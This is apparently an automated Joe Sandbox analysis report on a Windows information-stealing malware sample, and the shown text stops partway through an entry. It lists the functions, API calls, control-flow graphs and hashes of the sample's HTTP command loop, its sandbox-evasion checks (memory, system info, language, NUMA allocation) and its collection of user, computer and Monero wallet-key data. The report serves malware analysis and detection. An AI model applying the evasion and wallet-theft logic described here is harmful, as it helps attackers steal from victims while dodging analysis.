                          • Associated: 00000000.00000002.2155154997.000000000065C000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2155496811.00000000007F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2156048984.00000000007F7000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_160000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Internet$CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
                          • String ID: ERROR$ERROR$GET
                          • API String ID: 3749127164-2509457195
                          • Opcode ID: 7c4df78e74bd8cd61c839a6354fcb258892633241165863b8517c9719a7a17d0
                          • Instruction ID: 048512d769259c9f3c3f76561c126f34d4fd8cce07da502b4eaf48f5a647b279
                          • Opcode Fuzzy Hash: 7c4df78e74bd8cd61c839a6354fcb258892633241165863b8517c9719a7a17d0
                          • Instruction Fuzzy Hash: 64714D71A00218ABDB24EFA0DC59FEE77B8FF44701F508198F50A6B190DBB56A85CF52
                          Function 00175510 Relevance: 23.1, APIs: 7, Strings: 6, Instructions: 383sleepCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 1090 175510-175577 call 175ad0 call 17a820 * 3 call 17a740 * 4 1106 17557c-175583 1090->1106 1107 1755d7-17564c call 17a740 * 2 call 161590 call 1752c0 call 17a8a0 call 17a800 call 17aad0 StrCmpCA 1106->1107 1108 175585-1755b6 call 17a820 call 17a7a0 call 161590 call 1751f0 1106->1108 1134 175693-1756a9 call 17aad0 StrCmpCA 1107->1134 1138 17564e-17568e call 17a7a0 call 161590 call 1751f0 call 17a8a0 call 17a800 1107->1138 1124 1755bb-1755d2 call 17a8a0 call 17a800 1108->1124 1124->1134 1139 1756af-1756b6 1134->1139 1140 1757dc-175844 call 17a8a0 call 17a820 * 2 call 161670 call 17a800 * 4 call 176560 call 161550 1134->1140 1138->1134 1143 1756bc-1756c3 1139->1143 1144 1757da-17585f call 17aad0 StrCmpCA 1139->1144 1270 175ac3-175ac6 1140->1270 1147 1756c5-175719 call 17a820 call 17a7a0 call 161590 call 1751f0 call 17a8a0 call 17a800 1143->1147 1148 17571e-175793 call 17a740 * 2 call 161590 call 1752c0 call 17a8a0 call 17a800 call 17aad0 StrCmpCA 1143->1148 1162 175865-17586c 1144->1162 1163 175991-1759f9 call 17a8a0 call 17a820 * 2 call 161670 call 17a800 * 4 call 176560 call 161550 1144->1163 1147->1144 1148->1144 1249 175795-1757d5 call 17a7a0 call 161590 call 1751f0 call 17a8a0 call 17a800 1148->1249 1170 175872-175879 1162->1170 1171 17598f-175a14 call 17aad0 StrCmpCA 1162->1171 1163->1270 1178 1758d3-175948 call 17a740 * 2 call 161590 call 1752c0 call 17a8a0 call 17a800 call 17aad0 StrCmpCA 1170->1178 1179 17587b-1758ce call 17a820 call 17a7a0 call 161590 call 1751f0 call 17a8a0 call 17a800 1170->1179 1199 175a16-175a21 Sleep 1171->1199 1200 175a28-175a91 call 17a8a0 call 17a820 * 2 call 161670 call 17a800 * 4 call 176560 call 161550 1171->1200 1178->1171 1275 17594a-17598a call 17a7a0 call 161590 call 1751f0 call 17a8a0 call 17a800 1178->1275 1179->1171 1199->1106 1200->1270 1249->1144 1275->1171
                          APIs
                            • Part of subcall function 0017A820: lstrlen.KERNEL32(00164F05,?,?,00164F05,00180DDE), ref: 0017A82B
                            • Part of subcall function 0017A820: lstrcpy.KERNEL32(00180DDE,00000000), ref: 0017A885
                            • Part of subcall function 0017A740: lstrcpy.KERNEL32(00180E17,00000000), ref: 0017A788
                          • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00175644
                          • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 001756A1
                          • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00175857
                            • Part of subcall function 0017A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0017A7E6
                            • Part of subcall function 001751F0: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00175228
                            • Part of subcall function 0017A8A0: lstrcpy.KERNEL32(?,00180E17), ref: 0017A905
                            • Part of subcall function 001752C0: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00175318
                            • Part of subcall function 001752C0: lstrlen.KERNEL32(00000000), ref: 0017532F
                            • Part of subcall function 001752C0: StrStrA.SHLWAPI(00000000,00000000), ref: 00175364
                            • Part of subcall function 001752C0: lstrlen.KERNEL32(00000000), ref: 00175383
                            • Part of subcall function 001752C0: lstrlen.KERNEL32(00000000), ref: 001753AE
                          • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 0017578B
                          • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00175940
                          • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00175A0C
                          • Sleep.KERNEL32(0000EA60), ref: 00175A1B
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2152271112.0000000000161000.00000040.00000001.01000000.00000003.sdmp, Offset: 00160000, based on PE: true
                          • Associated: 00000000.00000002.2152147677.0000000000160000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.0000000000211000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.000000000021D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.0000000000242000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.00000000003AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.00000000003BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.0000000000645000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.000000000064B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2155154997.000000000065C000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2155496811.00000000007F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2156048984.00000000007F7000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_160000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpylstrlen$Sleep
                          • String ID: ERROR$ERROR$ERROR$ERROR$ERROR$ERROR
                          • API String ID: 507064821-2791005934
                          • Opcode ID: a24353f329dfa94c8a70d02de519ff97d97518ef757989ff38eef055517433e8
                          • Instruction ID: b926323940339baa0337ceb54897c394d3f5d07e0a2f75a5725a88a30a952074
                          • Opcode Fuzzy Hash: a24353f329dfa94c8a70d02de519ff97d97518ef757989ff38eef055517433e8
                          • Instruction Fuzzy Hash: 9BE14272910508ABCB19FBB0DC56AEE737DAFA5301F90C528B41A57091EF746B09CB93
                          Function 001717A0 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 162COMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 1301 1717a0-1717cd call 17aad0 StrCmpCA 1304 1717d7-1717f1 call 17aad0 1301->1304 1305 1717cf-1717d1 ExitProcess 1301->1305 1309 1717f4-1717f8 1304->1309 1310 1719c2-1719cd call 17a800 1309->1310 1311 1717fe-171811 1309->1311 1312 171817-17181a 1311->1312 1313 17199e-1719bd 1311->1313 1316 171835-171844 call 17a820 1312->1316 1317 171913-171924 StrCmpCA 1312->1317 1318 171932-171943 StrCmpCA 1312->1318 1319 1718f1-171902 StrCmpCA 1312->1319 1320 171951-171962 StrCmpCA 1312->1320 1321 171970-171981 StrCmpCA 1312->1321 1322 17187f-171890 StrCmpCA 1312->1322 1323 17185d-17186e StrCmpCA 1312->1323 1324 171821-171830 call 17a820 1312->1324 1325 1718cf-1718e0 StrCmpCA 1312->1325 1326 17198f-171999 call 17a820 1312->1326 1327 1718ad-1718be StrCmpCA 1312->1327 1328 171849-171858 call 17a820 1312->1328 1313->1309 1316->1313 1350 171926-171929 1317->1350 1351 171930 1317->1351 1329 171945-171948 1318->1329 1330 17194f 1318->1330 1348 171904-171907 1319->1348 1349 17190e 1319->1349 1331 171964-171967 1320->1331 1332 17196e 1320->1332 1334 171983-171986 1321->1334 1335 17198d 1321->1335 1342 171892-17189c 1322->1342 1343 17189e-1718a1 1322->1343 1340 171870-171873 1323->1340 1341 17187a 1323->1341 1324->1313 1346 1718e2-1718e5 1325->1346 1347 1718ec 1325->1347 1326->1313 1344 1718c0-1718c3 1327->1344 1345 1718ca 1327->1345 1328->1313 1329->1330 1330->1313 1331->1332 1332->1313 1334->1335 1335->1313 1340->1341 1341->1313 1355 1718a8 1342->1355 1343->1355 1344->1345 1345->1313 1346->1347 1347->1313 1348->1349 1349->1313 1350->1351 1351->1313 1355->1313
                          APIs
                          • StrCmpCA.SHLWAPI(00000000,block), ref: 001717C5
                          • ExitProcess.KERNEL32 ref: 001717D1
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2152271112.0000000000161000.00000040.00000001.01000000.00000003.sdmp, Offset: 00160000, based on PE: true
                          • Associated: 00000000.00000002.2152147677.0000000000160000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.0000000000211000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.000000000021D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.0000000000242000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.00000000003AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.00000000003BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.0000000000645000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.000000000064B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2155154997.000000000065C000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2155496811.00000000007F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2156048984.00000000007F7000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_160000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: ExitProcess
                          • String ID: block
                          • API String ID: 621844428-2199623458
                          • Opcode ID: fb264f17b35e7d126fd262c2e210cc5655307524dafcf55c559178be26d62641
                          • Instruction ID: 962dd092440af0df72329af0dbc5fb9d41f97488502670607f136c0e965e75ae
                          • Opcode Fuzzy Hash: fb264f17b35e7d126fd262c2e210cc5655307524dafcf55c559178be26d62641
                          • Instruction Fuzzy Hash: B3514FB5A08209FFCB05DFE4D954ABE77B9BF84704F10C048E90AA7240D775EA56CB62
                          Function 00177500 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 106memoryCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 1356 177500-17754a GetWindowsDirectoryA 1357 177553-1775c7 GetVolumeInformationA call 178d00 * 3 1356->1357 1358 17754c 1356->1358 1365 1775d8-1775df 1357->1365 1358->1357 1366 1775e1-1775fa call 178d00 1365->1366 1367 1775fc-177617 GetProcessHeap RtlAllocateHeap 1365->1367 1366->1365 1369 177619-177626 call 17a740 1367->1369 1370 177628-177658 wsprintfA call 17a740 1367->1370 1377 17767e-17768e 1369->1377 1370->1377
                          APIs
                          • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00177542
                          • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0017757F
                          • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00177603
                          • RtlAllocateHeap.NTDLL(00000000), ref: 0017760A
                          • wsprintfA.USER32 ref: 00177640
                            • Part of subcall function 0017A740: lstrcpy.KERNEL32(00180E17,00000000), ref: 0017A788
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2152271112.0000000000161000.00000040.00000001.01000000.00000003.sdmp, Offset: 00160000, based on PE: true
                          • Associated: 00000000.00000002.2152147677.0000000000160000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.0000000000211000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.000000000021D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.0000000000242000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.00000000003AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.00000000003BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.0000000000645000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.000000000064B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2155154997.000000000065C000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2155496811.00000000007F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2156048984.00000000007F7000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_160000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowslstrcpywsprintf
                          • String ID: :$C$\
                          • API String ID: 1544550907-3809124531
                          • Opcode ID: 58ec54d93e30cd6047dcdf6c9e1195a6d661935bae6a9863dcbbac509b9c071b
                          • Instruction ID: 880ed3d53accdbfffdbfa5f4ea5996ca86636ea2f83495e2788498f1f93cc92a
                          • Opcode Fuzzy Hash: 58ec54d93e30cd6047dcdf6c9e1195a6d661935bae6a9863dcbbac509b9c071b
                          • Instruction Fuzzy Hash: 3F41B3B1D04248ABDB11DF94DC45BEEBBB8EF18700F104198F509A7280D7796A44CFA5
                          Function 001769F0 Relevance: 9.1, APIs: 6, Instructions: 89sleepCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          APIs
                            • Part of subcall function 00179860: GetProcAddress.KERNEL32(76210000,00CC1738), ref: 001798A1
                            • Part of subcall function 00179860: GetProcAddress.KERNEL32(76210000,00CC1528), ref: 001798BA
                            • Part of subcall function 00179860: GetProcAddress.KERNEL32(76210000,00CC15A0), ref: 001798D2
                            • Part of subcall function 00179860: GetProcAddress.KERNEL32(76210000,00CC15D0), ref: 001798EA
                            • Part of subcall function 00179860: GetProcAddress.KERNEL32(76210000,00CC1540), ref: 00179903
                            • Part of subcall function 00179860: GetProcAddress.KERNEL32(76210000,00CC9478), ref: 0017991B
                            • Part of subcall function 00179860: GetProcAddress.KERNEL32(76210000,00CB64A0), ref: 00179933
                            • Part of subcall function 00179860: GetProcAddress.KERNEL32(76210000,00CB62E0), ref: 0017994C
                            • Part of subcall function 00179860: GetProcAddress.KERNEL32(76210000,00CC1648), ref: 00179964
                            • Part of subcall function 00179860: GetProcAddress.KERNEL32(76210000,00CC1588), ref: 0017997C
                            • Part of subcall function 00179860: GetProcAddress.KERNEL32(76210000,00CC1600), ref: 00179995
                            • Part of subcall function 00179860: GetProcAddress.KERNEL32(76210000,00CC1750), ref: 001799AD
                            • Part of subcall function 00179860: GetProcAddress.KERNEL32(76210000,00CB6320), ref: 001799C5
                            • Part of subcall function 00179860: GetProcAddress.KERNEL32(76210000,00CC17B0), ref: 001799DE
                            • Part of subcall function 0017A740: lstrcpy.KERNEL32(00180E17,00000000), ref: 0017A788
                            • Part of subcall function 001611D0: ExitProcess.KERNEL32 ref: 00161211
                            • Part of subcall function 00161160: GetSystemInfo.KERNEL32(?), ref: 0016116A
                            • Part of subcall function 00161160: ExitProcess.KERNEL32 ref: 0016117E
                            • Part of subcall function 00161110: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 0016112B
                            • Part of subcall function 00161110: VirtualAllocExNuma.KERNEL32(00000000), ref: 00161132
                            • Part of subcall function 00161110: ExitProcess.KERNEL32 ref: 00161143
                            • Part of subcall function 00161220: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0016123E
                            • Part of subcall function 00161220: __aulldiv.LIBCMT ref: 00161258
                            • Part of subcall function 00161220: __aulldiv.LIBCMT ref: 00161266
                            • Part of subcall function 00161220: ExitProcess.KERNEL32 ref: 00161294
                            • Part of subcall function 00176770: GetUserDefaultLangID.KERNEL32 ref: 00176774
                            • Part of subcall function 00161190: ExitProcess.KERNEL32 ref: 001611C6
                            • Part of subcall function 00177850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,001611B7), ref: 00177880
                            • Part of subcall function 00177850: RtlAllocateHeap.NTDLL(00000000), ref: 00177887
                            • Part of subcall function 00177850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 0017789F
                            • Part of subcall function 001778E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00177910
                            • Part of subcall function 001778E0: RtlAllocateHeap.NTDLL(00000000), ref: 00177917
                            • Part of subcall function 001778E0: GetComputerNameA.KERNEL32(?,00000104), ref: 0017792F
                            • Part of subcall function 0017A9B0: lstrlen.KERNEL32(?,00CC9188,?,\Monero\wallet.keys,00180E17), ref: 0017A9C5
                            • Part of subcall function 0017A9B0: lstrcpy.KERNEL32(00000000), ref: 0017AA04
                            • Part of subcall function 0017A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0017AA12
                            • Part of subcall function 0017A8A0: lstrcpy.KERNEL32(?,00180E17), ref: 0017A905
                          • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,00CC9408,?,0018110C,?,00000000,?,00181110,?,00000000,00180AEF), ref: 00176ACA
                          • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00176AE8
                          • CloseHandle.KERNEL32(00000000), ref: 00176AF9
                          • Sleep.KERNEL32(00001770), ref: 00176B04
                          • CloseHandle.KERNEL32(?,00000000,?,00CC9408,?,0018110C,?,00000000,?,00181110,?,00000000,00180AEF), ref: 00176B1A
                          • ExitProcess.KERNEL32 ref: 00176B22
                          Memory Dump Source
                          • Source File: 00000000.00000002.2152271112.0000000000161000.00000040.00000001.01000000.00000003.sdmp, Offset: 00160000, based on PE: true
                          • Associated: 00000000.00000002.2152147677.0000000000160000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.0000000000211000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.000000000021D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.0000000000242000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.00000000003AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.00000000003BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.0000000000645000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.000000000064B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2155154997.000000000065C000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2155496811.00000000007F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2156048984.00000000007F7000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_160000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: AddressProc$Process$Exit$Heap$lstrcpy$AllocateCloseEventHandleNameUser__aulldiv$AllocComputerCreateCurrentDefaultGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
                          • String ID:
                          • API String ID: 2525456742-0
                          • Opcode ID: 1876b7bf37c464d366212fa25cb427763e4df33d777cac4ae4b88ee802c7dffe
                          • Instruction ID: 6abe883b5b858272df09eb4bfe63d20f5be6b85df77ce28b694fccc3295dba85
                          • Opcode Fuzzy Hash: 1876b7bf37c464d366212fa25cb427763e4df33d777cac4ae4b88ee802c7dffe
                          • Instruction Fuzzy Hash: E7311C71940208ABDB05FBF0DC56BEE7778AF65341F908518F21AA2192DF706A05CBA2
                          Function 00161220 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 41COMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 1436 161220-161247 call 1789b0 GlobalMemoryStatusEx 1439 161273-16127a 1436->1439 1440 161249-161271 call 17da00 * 2 1436->1440 1442 161281-161285 1439->1442 1440->1442 1444 161287 1442->1444 1445 16129a-16129d 1442->1445 1447 161292-161294 ExitProcess 1444->1447 1448 161289-161290 1444->1448 1448->1445 1448->1447
                          APIs
                          • GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0016123E
                          • __aulldiv.LIBCMT ref: 00161258
                          • __aulldiv.LIBCMT ref: 00161266
                          • ExitProcess.KERNEL32 ref: 00161294
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2152271112.0000000000161000.00000040.00000001.01000000.00000003.sdmp, Offset: 00160000, based on PE: true
                          • Associated: 00000000.00000002.2152147677.0000000000160000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.0000000000211000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.000000000021D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.0000000000242000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.00000000003AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.00000000003BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.0000000000645000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.000000000064B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2155154997.000000000065C000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2155496811.00000000007F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2156048984.00000000007F7000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_160000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: __aulldiv$ExitGlobalMemoryProcessStatus
                          • String ID: @
                          • API String ID: 3404098578-2766056989
                          • Opcode ID: b15068c960ab1ad95646360ec6b8bb3d5fc42370d9cbb93621e1ee41a7c1d1e1
                          • Instruction ID: f47c049c70f9bf0a772698abdb9e8d43fc88378cfb838b1df6262d112d225735
                          • Opcode Fuzzy Hash: b15068c960ab1ad95646360ec6b8bb3d5fc42370d9cbb93621e1ee41a7c1d1e1
                          • Instruction Fuzzy Hash: 56016DB0D40308BAEB10DBE0DC59BAEBB78BF14705F248458F705B62C0D77455458799
                          Function 00176AF3 Relevance: 6.0, APIs: 4, Instructions: 30sleepCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 1450 176af3 1451 176b0a 1450->1451 1453 176b0c-176b22 call 176920 call 175b10 CloseHandle ExitProcess 1451->1453 1454 176aba-176ad7 call 17aad0 OpenEventA 1451->1454 1459 176af5-176b04 CloseHandle Sleep 1454->1459 1460 176ad9-176af1 call 17aad0 CreateEventA 1454->1460 1459->1451 1460->1453
                          APIs
                          • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,00CC9408,?,0018110C,?,00000000,?,00181110,?,00000000,00180AEF), ref: 00176ACA
                          • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00176AE8
                          • CloseHandle.KERNEL32(00000000), ref: 00176AF9
                          • Sleep.KERNEL32(00001770), ref: 00176B04
                          • CloseHandle.KERNEL32(?,00000000,?,00CC9408,?,0018110C,?,00000000,?,00181110,?,00000000,00180AEF), ref: 00176B1A
                          • ExitProcess.KERNEL32 ref: 00176B22
                          Memory Dump Source
                          • Source File: 00000000.00000002.2152271112.0000000000161000.00000040.00000001.01000000.00000003.sdmp, Offset: 00160000, based on PE: true
                          • Associated: 00000000.00000002.2152147677.0000000000160000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.0000000000211000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.000000000021D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.0000000000242000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.00000000003AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.00000000003BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.0000000000645000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.000000000064B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2155154997.000000000065C000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2155496811.00000000007F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2156048984.00000000007F7000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_160000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: CloseEventHandle$CreateExitOpenProcessSleep
                          • String ID:
                          • API String ID: 941982115-0
                          • Opcode ID: 9488b15a4c2fb44c92d25ebecd629d2741e0b851acc74ffd38a4e3da44068dac
                          • Instruction ID: e6047ee838cd2441fdd43b6c577709179f768a697d95569d6d103a88d0d221e1
                          • Opcode Fuzzy Hash: 9488b15a4c2fb44c92d25ebecd629d2741e0b851acc74ffd38a4e3da44068dac
                          • Instruction Fuzzy Hash: 69F08230A40A09AFE701ABA0DC06BBE7B38FF15701F10C514F51BA31D1CBB05540DBA6
                          Function 001647B0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63stringnetworkCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          APIs
                          • lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00164839
                          • InternetCrackUrlA.WININET(00000000,00000000), ref: 00164849
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2152271112.0000000000161000.00000040.00000001.01000000.00000003.sdmp, Offset: 00160000, based on PE: true
                          • Associated: 00000000.00000002.2152147677.0000000000160000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.0000000000211000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.000000000021D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.0000000000242000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.00000000003AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.00000000003BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
